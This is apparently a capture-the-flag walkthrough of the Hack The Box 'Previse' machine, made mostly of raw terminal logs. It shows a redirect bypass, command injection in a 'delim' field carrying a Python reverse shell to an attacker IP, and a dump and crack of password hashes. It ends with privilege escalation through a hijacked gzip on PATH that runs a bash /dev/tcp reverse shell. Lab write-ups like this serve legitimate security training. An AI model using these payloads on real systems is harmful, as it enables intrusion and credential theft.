$ nmap -p- -T4 -A 10.129.115.17
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ dirb http://10.129.154.72
---- Scanning URL: http://10.129.154.72/ ----
==> DIRECTORY: http://10.129.154.72/css/
+ http://10.129.154.72/favicon.ico (CODE:200|SIZE:15406)
+ http://10.129.154.72/index.php (CODE:302|SIZE:2801)
==> DIRECTORY: http://10.129.154.72/js/
+ http://10.129.154.72/server-status (CODE:403|SIZE:278)
---- Entering directory: http://10.129.154.72/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.129.154.72/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
$ nikto -h 10.129.154.72
+ Server: Apache/2.4.29 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
$ ffuf -u http://10.129.154.72/FUZZ -w /usr/share/wordlists/dirb/big.txt -t 200 -c
.htaccess [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswd [Status: 403, Size: 278, Words: 20, Lines: 10]
css [Status: 301, Size: 312, Words: 20, Lines: 10]
favicon.ico [Status: 200, Size: 15406, Words: 15, Lines: 10]
js [Status: 301, Size: 311, Words: 20, Lines: 10]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10]
$ gobuster dir -u http://previse.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
/index.php (Status: 302) [Size: 2801] [--> login.php]
/download.php (Status: 302) [Size: 0] [--> login.php]
/login.php (Status: 200) [Size: 2224]
/files.php (Status: 302) [Size: 4914] [--> login.php]
/header.php (Status: 200) [Size: 980]
/nav.php (Status: 200) [Size: 1248]
/footer.php (Status: 200) [Size: 217]
/css (Status: 301) [Size: 308] [--> http://previse.htb/css/]
/status.php (Status: 302) [Size: 2966] [--> login.php]
/js (Status: 301) [Size: 307] [--> http://previse.htb/js/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/accounts.php (Status: 302) [Size: 3994] [--> login.php]
/config.php (Status: 200) [Size: 0]
/logs.php (Status: 302) [Size: 0] [--> login.php]
/server-status (Status: 403) [Size: 276]
http://previse.htb/nav.php
How to bypass website redirect with burp suite
1.Burp->Proxy->Open Browser
http://previse.htb/nav.php -> CREATE ACCOUNT
Burp->HTTP History->Respons: HTTP/1.1 302 Found
Capturing the respons and filtering 30X responses to 200 OK will bypass this redirection.
Using Burp Suite navigate to:
Proxy->Options->Intercept Server Responses->Check box (Intercept response based on the following rules:)
Now scroll down to "Match and Replace" section and ADD a new rule.
You will have to fill in blanks:
- Type: Response header
- Match: 30[12] Found <-- This will march either 301 or 302
- Replace : 200 OK
- Comment: Blockchainer bypass
- Check the "Regex match"
Click OK, enable the setting by activating the checkbox
http://previse.htb/accounts.php
create new user account, Success! User was added!
login http://previse.htb/index.php with created user/passwd
go http://previse.htb/files.php download file siteBackup.zip
kali@kali:~/0.htb/release_arena/Previse/siteBackup$ cat config.php
<?php
function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}
?>
2.change the response from a 302 to 200 to access the account page.
Burp Suite http://previse.htb/nav.php
on GET /account.php HTTP/1.1
right click and select Do intercept-> Response to this request
then change HTTP/1.1 302 Found->HTTP/1.1 200 Found
click Forward and create account on http://previse.htb/accounts.php
login http://previse.htb/index.php download file SITEBACKUP.ZIP
logs.php
/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////
$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;
vulnerable to command injection.
$ rlwrap -cAr nc -lnvp 4444
Login as new user, goto the Management menu > logs. Capture the request in burp and add a python reverse shell to the delim attribute.
delim=comma;python3+-c+'import+os,pty,socket%3bs%3dsocket.socket()%3bs.connect(("10.10.14.133",4444))%3b[os.dup2(s.fileno(),f)for+f+in(0,1,2)]%3bpty.spawn("/bin/bash")'
kali@kali:~/0.htb/release_arena/Previse$ rlwrap -cAr nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.133] from (UNKNOWN) [10.129.158.226] 48430
www-data@previse:/var/www/html$
mysql -u root -p
mySQL_p@ssw0rd!:)
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 15
Server version: 5.7.35-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2021, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| previse |
| sys |
+--------------------+
5 rows in set (0.00 sec)
use previse;
use previse;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
show tables;
show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts |
| files |
+-------------------+
2 rows in set (0.00 sec)
select * from accounts;
select * from accounts;
+----+-----------+------------------------------------+---------------------+
| id | username | password | created_at |
+----+-----------+------------------------------------+---------------------+
| 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
| 2 | cptadmin | $1$🧂llol$79cV9c1FNnnr7LcfPFlqQ0 | 2021-08-09 22:17:53 |
| 3 | cticadmin | $1$🧂llol$79cV9c1FNnnr7LcfPFlqQ0 | 2021-08-10 21:41:22 |
+----+-----------+------------------------------------+---------------------+
3 rows in set (0.00 sec)
drwxr-xr-x 5 m4lwhere m4lwhere 4096 Jul 28 09:10 m4lwhere
www-data@previse:/home$
$ hashcat -a 0 -m 500 malware.txt /usr/share/wordlists/rockyou.txt --show
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!
kali@kali:~/0.htb/release_arena/Previse$ john -format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt-long, crypt(3) $1$ (and variants) [MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ilovecody112235! (?)
1g 0:00:04:22 DONE (2021-08-08 19:55) 0.003815g/s 28288p/s 28288c/s 28288C/s ilovecodydean..ilovecody..
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:~/0.htb/release_arena/Previse$ ssh m4lwhere@previse.htb
m4lwhere@previse.htb's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Aug 8 17:18:20 UTC 2021
System load: 0.0 Processes: 171
Usage of /: 52.4% of 4.85GB Users logged in: 0
Memory usage: 32% IP address for eth0: 10.129.154.72
Swap usage: 0%
0 updates can be applied immediately.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$
m4lwhere@previse:~$ cat user.txt
b3125ede488b9939857fe5283563cfb5
m4lwhere@previse:~$
m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere:
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
m4lwhere@previse:~$
m4lwhere@previse:/opt/scripts$ cat log_process.py
import pandas as pd
from sys import argv
if argv[1] == 'space':
delims = ' '
elif argv[1] == 'tab':
delims = '\t'
else:
delims = ','
df = pd.read_csv('/var/www/file_access.log',
index_col='time',
names=['time', 'user', 'fileID'])
df.to_csv('/var/www/out.log', sep=delims)
m4lwhere@previse:/opt/scripts$
kali@kali:~/0.htb/release_arena/Previse$ nc -lvnp 5555
listening on [any] 5555 ...
m4lwhere@previse:/tmp$ vi gzip
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.133/5555 0>&1
m4lwhere@previse:/tmp$ export PATH=$(pwd):$PATH
m4lwhere@previse:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/u
m4lwhere@previse:/tmp$ chmod +x gzip
m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh
kali@kali:~/0.htb/release_arena/Previse$ nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.10.14.133] from (UNKNOWN) [10.129.154.72] 50678
root@previse:/tmp#
root@previse:/root# ccaatt rroooott..ttxxtt
79ba66232e2d29b3d2757396fc565491
root@previse:/root#